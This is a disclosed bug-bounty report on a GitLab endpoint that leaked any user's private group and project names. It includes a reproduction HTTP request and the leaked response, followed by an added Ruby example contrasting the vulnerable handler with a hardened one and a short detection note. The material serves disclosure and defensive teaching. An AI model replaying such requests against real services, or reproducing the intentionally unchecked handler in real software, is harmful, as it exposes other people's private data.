Disclosure of Any User's Private Group Info by `available_group_templates`
HackerOne report #475240 by ngalog
on 2019-01-06, assigned to asaba:
Summary: Lately GitLab allows users to create a project from a group template; the newly introduced endpoint didn't perform an access control check, allowing an unauthorized user to access the private group info of other users.
Steps To Reproduce:
- Log in to gitlab.com
- Visit https://gitlab.com/users/ashleyjohnson/available_group_templates
- In Burp, send the request to Repeater
- Add this line to the headers:
X-CSRF-Token: testing
The full request should look like:
GET /users/ashleyjohnson/available_group_templates HTTP/1.1
Host: gitlab.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: X-CSRF-Token: testing
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Cookie: xxx
Upgrade-Insecure-Requests: 1
Then my private group new-jjj-groupaaa is leaked, and all of the project names/namespaces (gitlab-ce) are leaked too.
Leaked info:
var target = $(".project-templates-buttons#custom-group-project-templates");
target.empty();
target.html("<div class=\"custom-project-templates\">\n<div class=\"border-top-0 expanded js-template-group-options template-group-options\">\n<div class=\"template-header d-flex align-items-center\">\n<div class=\"template-subgroup d-flex flex-fill align-items-center\">\n<div class=\"template-options-icon-container d-flex justify-content-center align-items-center append-right-10\">\n<svg class=\"s16 options-expanded-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-down\"><\/use><\/svg>\n<svg class=\"s16 options-collapsed-icon\"><use xlink:href=\"https://gitlab.com/assets/icons-1bbf3f0e2e8f631ea6006c647f843db214684476054223102c16630dabc450d4.svg#angle-right\"><\/use><\/svg>\n<\/div>\n<div class=\"avatar-container s40\">\n<div class=\"btn-template-icon avatar s40 avatar-tile identicon bg4\">N<\/div>\n<\/div>\n<div class=\"template-subgroup-name prepend-left-5\">\n<strong>newsub<\/strong>\n<\/div>\n<\/div>\n<div class=\"template-subgroup-project-count\">\n<span class=\"badge badge-pill\">\n<strong>\n2\n<\/strong>\n<\/span>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"tempalte\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10227470/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\ntempalte\n<\/strong>\n<br>\n<div class=\"text-muted\">\nteamplte\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/tempalte\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"tempalte\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"tempalte\" name=\"project[template_name]\" type=\"radio\" 
value=\"tempalte\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<div class=\"template-option align-items-center\">\n<div class=\"avatar-container s40\">\n<img alt=\"GitLab Community Edition\" class=\"btn-template-icon avatar s40 avatar-tile\" src=\"https://gitlab.com/uploads/-/system/project/avatar/10181735/logo-extra-whitespace.png\" />\n<\/div>\n<div class=\"description prepend-left-5\">\n<strong>\nGitLab Community Edition\n<\/strong>\n<br>\n<div class=\"text-muted\">\nGitLab Community Edition (CE) is an open source end-to-end software development platform with built-in version control, issue tracking, code review, CI/CD, and more. Self-host GitLab CE on your own servers, in a container, or on a cloud provider.\n<\/div>\n<\/div>\n<div class=\"controls d-flex align-items-baseline\">\n<a class=\"btn btn-default append-right-10\" href=\"/new-jjj-groupaaa/newsub/gitlab-ce\" rel=\"noopener noreferrer\" target=\"_blank\">\nPreview\n<\/a>\n<label class=\"btn btn-success custom-template-button choose-template append-bottom-0\" for=\"GitLab Community Edition\">\n<input autocomplete=\"off\" data-subgroup-id=\"4324729\" id=\"GitLab Community Edition\" name=\"project[template_name]\" type=\"radio\" value=\"GitLab Community Edition\">\n<span>\nUse template\n<\/span>\n<\/label>\n<\/div>\n<\/div>\n<\/div>\n\n<\/div>\n");
target.trigger("ajax:success");
Impact
Leaked this info to any unauthorised user.
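The bug class here is a per-user endpoint that derives its whole response from the username in the URL and never asks who is making the request. The X-CSRF-Token and X-Requested-With headers in the reproduction only make the request look like the page's own AJAX call; CSRF protection governs where a request came from, not who is allowed to read the result, so it cannot stand in for authorization. The following is an added example, not GitLab's code and not the reporter's: a minimal Ruby model of the missing check beside a hardened version. Every class, user, group and helper name in it is constructed for illustration.

```ruby
# Added example, not GitLab's code: a minimal Ruby model of the access-control
# gap in the report (a per-user endpoint that never checks who is asking) next
# to the check that closes it. Every class, user and group below is constructed
# for illustration; the helper names are assumptions, not GitLab identifiers.

User    = Struct.new(:username)
Project = Struct.new(:name, :namespace)
Group   = Struct.new(:path, :visibility, :members, :projects)

class Forbidden < StandardError; end

# Constructed data: "alice" owns a private group holding two template projects
# and a public group holding one.
ALICE = User.new("alice")
BOB   = User.new("bob")

PRIVATE_GROUP = Group.new("new-jjj-groupaaa", :private, [ALICE], [
  Project.new("tempalte",  "new-jjj-groupaaa/newsub"),
  Project.new("gitlab-ce", "new-jjj-groupaaa/newsub"),
])
PUBLIC_GROUP = Group.new("oss", :public, [ALICE], [Project.new("lib", "oss")])

GROUPS_BY_OWNER = { "alice" => [PRIVATE_GROUP, PUBLIC_GROUP] }.freeze

def template_paths(groups)
  groups.flat_map { |g| g.projects.map { |p| "#{p.namespace}/#{p.name}" } }
end

# Vulnerable pattern: the response is derived entirely from the :username in
# the URL. current_user is accepted but never consulted, so any logged-in
# account that can send a well-formed AJAX request receives another user's
# private group and project names.
def available_group_templates_vulnerable(current_user, target_username)
  template_paths(GROUPS_BY_OWNER.fetch(target_username, []))
end

# Group-level read check: public groups are visible to everyone, private ones
# only to members. An anonymous requester (nil) can only see public groups.
def can_read_group?(user, group)
  group.visibility == :public || (user && group.members.include?(user))
end

# Hardened version with two layers:
#  1. the route is scoped to one user, so only that user may list "their"
#     available templates; anyone else gets Forbidden, which a controller
#     would normally render as 404 so the resource's existence is not confirmed;
#  2. each group is still filtered through can_read_group?, so a later change
#     that relaxes layer 1 cannot silently expose private groups.
def available_group_templates(current_user, target_username)
  unless current_user && current_user.username == target_username
    raise Forbidden, "not allowed to list templates for #{target_username}"
  end

  visible = GROUPS_BY_OWNER.fetch(target_username, []).select do |g|
    can_read_group?(current_user, g)
  end
  template_paths(visible)
end

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable, bob asks for alice:   #{available_group_templates_vulnerable(BOB, 'alice').inspect}"
  puts "hardened,   alice asks for alice: #{available_group_templates(ALICE, 'alice').inspect}"
  begin
    available_group_templates(BOB, 'alice')
  rescue Forbidden => e
    puts "hardened,   bob asks for alice:   #{e.message}"
  end
end
```

The detection side follows from the same shape: a request for `/users/<A>/available_group_templates` carrying a session for user B is anomalous on its face, so logging the authenticated user alongside the path parameter makes both the original exposure and any regression visible in access logs.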